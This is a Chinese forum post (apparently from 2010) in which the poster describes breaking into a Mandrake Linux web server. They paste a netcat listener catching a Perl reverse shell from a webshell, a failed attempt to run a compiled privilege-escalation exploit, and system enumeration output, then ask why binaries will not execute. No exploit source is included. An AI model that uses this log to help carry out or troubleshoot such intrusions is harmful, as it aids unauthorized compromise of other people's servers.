最近在入侵一臺(tái)Linux主機(jī)時(shí)遇到了一個(gè)奇怪的權(quán)限問(wèn)題,請(qǐng)大家指教一下.
目前的權(quán)限是有一個(gè)webshell,下面是我用perl反向連接的shell得到的結(jié)果:
引用:
C:\Documents and Settings\Administrator>nc -vv -l -p 1234
listening on [any] 1234 ...
x.x.x.x: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [x.x.x.x] from (UNKNOWN) [y.y.y.y] 54409: NO_DATA
Enjoy the Shell.
bash: no job control in this shell
bash-2.05b $id
uid=72(apache) gid=72(apache) groups=72(apache)
bash-2.05b$ uname -a
Linux flyfool 2.4.21-0.13mdksecure #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown unknown GNU/Linux
bash-2.05b$ cat /etc/redhat-release
Mandrake Linux release 9.1 (Bamboo) for i586
bash-2.05b$ pwd
/var/www/html/xoop/html
bash-2.05b$ gcc e.c -o e
e.c: In function `check_vma_flags':
e.c:545: warning: deprecated use of label at end of compound statement
e.c:905:2: warning: no newline at end of file
bash-2.05b$ ./e
bash: ./e: Permission denied
bash-2.05b$ ls -l e
-rwxr-xr-x 1 apache apache 26131 May 10 20:16 e
bash-2.05b$ ls -l a.pl
-rwxr-xr-x 1 apache apache 34 May 10 19:13 a.pl
bash-2.05b$ cat a.pl
#!/usr/bin/perl
print "test\n";
bash-2.05b$ ./a.pl
: bad interpreter: Permission denied
bash-2.05b$ perl a.pl
test
bash-2.05b$
其中e.c是一個(gè)exploit,能夠
編譯,運(yùn)行卻說(shuō)Permission denied,但他的確有執(zhí)行權(quán)限.
難道是禁用了某些系統(tǒng)調(diào)用?不過(guò)我又寫(xiě)了個(gè)c語(yǔ)言的helloworld都沒(méi)有權(quán)限執(zhí)行.
a.pl只是測(cè)試用的,為什么./a.pl不能執(zhí)行,而perl a.pl卻可以?
在webshell上運(yùn)行反彈程序的時(shí)候也是只能用perl name.pl
然后我想看看開(kāi)了什么端口:
引用:
bash-2.05b$ netstat -ant
/proc/net/tcp: Permission denied
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
bash-2.05b$ cd /proc
bash-2.05b$ ls -l
total 0
dr-x------ 3 apache apache 0 May 10 20:24 13624
dr-x------ 3 apache apache 0 May 10 20:24 16285
dr-x------ 3 apache apache 0 May 10 20:24 16586
dr-x------ 3 apache apache 0 May 10 20:24 21445
dr-x------ 3 apache apache 0 May 10 20:24 25574
dr-x------ 3 apache apache 0 May 10 20:24 28583
dr-x------ 3 apache apache 0 May 10 20:24 29522
dr-x------ 3 apache apache 0 May 10 20:24 31649
dr-x------ 3 apache apache 0 May 10 20:24 32003
dr-x------ 3 apache apache 0 May 10 20:24 5371
dr-x------ 3 apache apache 0 May 10 20:24 5405
dr-x------ 3 apache apache 0 May 10 20:24 6910
dr-x------ 3 apache apache 0 May 10 20:24 8060
dr-xr-xr-x 10 root root 0 Mar 19 16:12 acpi
dr-x------ 4 root root 0 Mar 19 16:11 bus
-r-------- 1 root root 0 May 10 20:24 cmdline
-r-------- 1 root root 0 May 10 20:24 cpuinfo
-r-------- 1 root root 0 May 10 20:24 devices
-r-------- 1 root root 0 May 10 20:24 dma
dr-xr-xr-x 2 root root 0 May 10 20:24 driver
-r--r--r-- 1 root root 0 May 10 20:24 e820info
-r--r--r-- 1 root root 0 May 10 20:24 execdomains
-r--r--r-- 1 root root 0 May 10 20:24 fb
-r--r--r-- 1 root root 0 May 10 20:24 filesystems
dr-xr-xr-x 2 root root 0 May 10 20:24 fs
dr-xr-xr-x 4 root root 0 May 10 20:24 ide
-r-------- 1 root root 0 May 10 20:24 interrupts
-r-------- 1 root root 0 May 10 20:24 iomem
-r-------- 1 root root 0 May 10 20:24 ioports
dr-xr-xr-x 18 root root 0 May 10 20:24 irq
-r-------- 1 root root 0 Mar 19 16:12 kmsg
-r-------- 1 root root 0 May 10 20:24 ksyms
-r--r--r-- 1 root root 0 May 10 20:24 loadavg
-r--r--r-- 1 root root 0 May 10 20:24 locks
-r--r--r-- 1 root root 0 May 10 20:24 mdstat
-r--r--r-- 1 root root 0 May 10 20:24 meminfo
-r--r--r-- 1 root root 0 May 10 20:24 misc
-r-------- 1 root root 0 May 10 20:24 modules
lrwxrwxrwx 1 root root 11 May 10 20:24 mounts -> self/mounts
-rw-r--r-- 1 root root 66 May 10 20:24 mtrr
dr-x------ 5 root root 0 May 10 20:24 net
-r--r--r-- 1 root root 0 May 10 20:24 partitions
-r-------- 1 root root 0 May 10 20:24 pci
lrwxrwxrwx 1 root root 64 Mar 19 16:11 self -> 29522
-r-------- 1 root root 0 May 10 20:24 slabinfo
-r--r--r-- 1 root root 0 May 10 20:24 stat
-r--r--r-- 1 root root 0 May 10 20:24 swaps
dr-x------ 11 root root 0 May 10 20:24 sys
dr-xr-xr-x 2 root root 0 May 10 20:24 sysvipc
dr-xr-xr-x 4 root root 0 May 10 20:24 tty
-r--r--r-- 1 root root 0 May 10 20:24 uptime
-r--r--r-- 1 root root 0 May 10 20:24 version
bash-2.05b$
好變態(tài),端口都不能看,/proc下很多文件都是root只讀.
開(kāi)始我以為是我所在的分區(qū)被設(shè)置了noexec,但是:
引用:
bash-2.05b$ mount -l
/dev/hda1 on / type ext3 (rw) []
none on /proc type proc (rw)
none on /proc/bus/usb type usbdevfs (rw)
none on /dev/pts type devpts (rw,mode=0620)
/dev/hda6 on /home type ext3 (rw) []
/dev/hda7 on /var type ext3 (rw) []
bash-2.05b$ cat /etc/fstab
/dev/hda1 / ext3 defaults 1 1
none /dev/pts devpts mode=0620 0 0
/dev/hda6 /home ext3 defaults 1 2
/dev/hdc /mnt/cdrom auto user,iocharset=gb2312,codepage=936,noauto,ro,exec 0 0
/dev/fd0 /mnt/floppy auto user,iocharset=gb2312,sync,codepage=936,noauto,exec 0 0
none /proc proc defaults 0 0
/dev/hda7 /var ext3 defaults 1 2
/dev/hda5 swap swap defaults 0 0
bash-2.05b$
加好友 
發(fā)短信
Post By:2010-11-15 9:18:42
